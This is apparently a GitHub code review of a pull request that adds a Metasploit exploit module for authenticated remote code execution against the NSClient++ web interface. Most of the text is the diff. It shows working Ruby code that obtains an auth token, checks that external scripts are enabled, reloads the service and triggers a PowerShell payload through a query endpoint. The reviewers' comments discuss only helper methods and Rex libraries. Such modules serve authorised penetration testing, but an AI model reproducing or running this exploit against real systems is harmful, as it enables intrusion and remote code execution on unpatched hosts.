modules/exploits/windows/http/nscp_authenticated_rce.rb

```diff
@@ -0,0 +1,228 @@
+      'headers' => { 'TOKEN' => token },
+      'uri' => normalize_uri('/core/reload')
+    })
+
+    print_status('Waiting for Application to reload . . .')
+    sleep(10)
+    response = false
+    count = 0
+    until response
+      begin
+        r = send_request_cgi({
+          'method' => 'GET',
+          'headers' => { 'TOKEN' => token },
+          'uri' => normalize_uri('/')
+        })
+        if !r.body.empty?
+          response = true
+        end
+      rescue StandardError
+        count += 1
+        if count > 10
+          print_status('Application failed to reload. Nice DoS exploit! /s')
+        end
+      end
+    end
+  end
+
+  def trigger_payload(token, key)
+    print_status('Triggering payload, should execute shortly . . .')
+
+    begin
+      send_request_cgi({
+        'method' => 'GET',
+        'headers' => { 'TOKEN' => token },
+        'uri' => normalize_uri('/query/' + key)
+      })
+    rescue StandardError
+      print_status('Timeout exceeded. Assuming your payload executed . . .')
+    end
+  end
+
+  def external_scripts_feature_enabled?(token)
+    endpoint = '/registry/control/module/load?name=CheckExternalScripts'
+
+    r = send_request_cgi({
+      'method' => 'GET',
+      'headers' => { 'TOKEN' => token },
+      'uri' => normalize_uri(endpoint)
+    })
+
+    r.body.to_s.include? 'STATUS_OK'
+  end
+
+  def get_auth_token
+    r = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri('/auth/token?password=' + datastore['PASSWORD'])
+    })
+
+    if r.code == 200
+      begin
+        auth_token = r.body.to_s[/"auth token": "(\w*)"/, 1]
+        return auth_token
+      rescue StandardError
+        :no_token_found
+      end
+    else
+      :wrong_password
+    end
+  rescue StandardError
+    :failed_to_connect
+  end
+
+  def check
+    token = get_auth_token
+
+    if token == :failed_to_connect
+      print_error("Can't access to NSClient web interface, maybe the web interface is not activated or something is wrong with the targeted host")
+      CheckCode::Safe
+    elsif token == :wrong_password
+      print_error('Unable to connect to NSClient web interface because the admin password given is wrong')
+      CheckCode::Unknown
+    elsif token == :no_token_found
+      print_error('Unable to get an authentification token, maybe the target is safe')
+      CheckCode::Unknown
+    else
+      print_good('Got auth token: ' + token)
+      if external_scripts_feature_enabled?(token)
+        print_good('External scripts feature enabled !')
+        CheckCode::Vulnerable
+      else
+        print_good('External scripts feature disabled !')
+        CheckCode::Safe
+      end
+    end
+  end
+
+  def exploit
+    cmd = cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true)
+    token = get_auth_token
+
+    if token != :failed_to_connect && token != :wrong_password && token != :no_token_found
+      rand_key = generate_random_name
```

Comment:
```suggestion
      rand_key = rand_text_alpha_lower(10)
```
You can replace this hand rolled method with a call to one of our random `Rex::Text` methods, it's way easier to read. I think `rand_text_alpha_lower(10)` is what you're looking for?

Reply:
Yes this matches my needs ! Didn't know something like that was already existing in msf. Do you know where I can find some other built-in functions like this one ?

Reply:
They can be hidden a bit I will admit it 😅  Best place to start looking for some msf specific needs (powershell scripts/NOP generation) is our various [Remote EXploitation (REX) libraries](https://github.com/rapid7?q=rex&type=&language=&sort=). 

Outside of that if you're looking for more generic stuff we usually have a good few libraries already in msf that you can make use of. You can check the [Gemfile](https://github.com/rapid7/metasploit-framework/blob/master/Gemfile.lock) for the complete list

Reply:
Thanks ! I will have a look for sure 😉 You're right, I find it rather difficult to find information about how to develop msf scripts 😅